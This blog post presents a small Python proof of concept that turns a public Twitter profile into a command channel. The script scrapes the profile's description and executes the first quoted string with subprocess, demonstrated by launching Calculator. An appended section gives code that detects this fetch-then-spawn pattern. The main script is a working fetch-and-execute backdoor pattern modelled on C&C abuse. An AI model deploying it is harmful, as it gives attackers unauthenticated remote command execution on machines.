Twitter Whisperer

A couple of days ago I read this post on how hackers abused Twitter as C&C. It got me wondering about the possibility of controlling your computer via Twitter.

And the answer is: Yes! You can control your computer via Twitter, without even using its API.

So imagine you don’t have access to SSH: you can send commands to your computer by just tweeting out whatever you want it to do… I know… there are so many security implications involved here. But yes, the possibilities are endless. There are a couple of caveats. The first one is that the computer you would be controlling remotely needs to have Python installed. The second one is that it needs to have a task scheduled to run the script, so if you set up an interval of 1 minute between runs, that is the time-lag you would need to consider if you want to send a command like the Panic-Button to unmount TrueCrypt drives and shut the computer off.

As a very simple POC, I will pop up the Calculator in Windows.

This is the code for Twitter Whisperer, which can be found here:

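from bs4 import BeautifulSoup as soupy
import urllib.request
import re
import subprocess

# Fetch the public profile page (no API involved).
html = urllib.request.urlopen("https://twitter.com/<your account here>").read()
soup = soupy(html, "lxml")

# Pull the double-quoted text out of the page's description meta tag.
x = soup.find("meta", {"name": "description"})['content']
command = re.findall('"([^"]*)"', x)

# Run the first quoted string as a command; do nothing if none was found.
if command:
    subprocess.call(command[0])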


Log in to your Twitter account and simply tweet: Calc.exe

Run the script, and watch the calculator pop up:

I know, it’s just too simple!
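Seen from the monitoring side, the script leaves a recognisable trace: a non-browser process contacts twitter.com, spawns a child process moments later, and repeats this at the scheduled-task interval. The following is an added example, not part of the original post, that correlates those events. The event layout, PIDs, timestamps, browser list and 10-second window are constructed assumptions.

```python
from datetime import datetime, timedelta

SOCIAL_HOSTS = {"twitter.com"}                          # hosts to watch (assumption)
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe"}  # expected clients, ignored
WINDOW = timedelta(seconds=10)                          # max fetch-to-spawn gap (assumption)

# Constructed sample telemetry: (time, kind, pid, parent pid, image, destination).
# "net" = outbound connection, "proc" = process creation. All values are made up.
EVENTS = [
    ("2024-01-01T10:00:01", "net", 4120, None, "python.exe", "twitter.com"),
    ("2024-01-01T10:00:03", "proc", 4388, 4120, "calc.exe", None),
    ("2024-01-01T10:00:20", "net", 900, None, "chrome.exe", "twitter.com"),
    ("2024-01-01T10:00:21", "proc", 950, 900, "chrome.exe", None),
    ("2024-01-01T10:01:01", "net", 5200, None, "python.exe", "twitter.com"),
    ("2024-01-01T10:01:02", "proc", 5260, 5200, "calc.exe", None),
    ("2024-01-01T10:05:00", "net", 6000, None, "python.exe", "pypi.org"),
    ("2024-01-01T10:05:02", "proc", 6100, 6000, "pip.exe", None),
]

def find_fetch_then_spawn(events):
    """Return (fetch_time, parent_image, host, child_image) for each match."""
    fetches = {}  # pid -> (time, image, host) of its latest watched-host connection
    hits = []
    for ts, kind, pid, ppid, image, dest in sorted(events, key=lambda e: e[0]):
        t = datetime.fromisoformat(ts)
        if kind == "net" and dest in SOCIAL_HOSTS and image.lower() not in BROWSERS:
            fetches[pid] = (t, image, dest)
        elif kind == "proc" and ppid in fetches:
            t0, parent, host = fetches[ppid]
            if t - t0 <= WINDOW:
                hits.append((t0, parent, host, image))
    return hits

def polling_intervals(hits):
    """Seconds between consecutive matches; a steady value suggests a scheduled task."""
    times = [h[0] for h in hits]
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]

if __name__ == "__main__":
    for fetch_time, parent, host, child in find_fetch_then_spawn(EVENTS):
        print(f"{fetch_time} {parent} -> {host}, then spawned {child}")
```
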
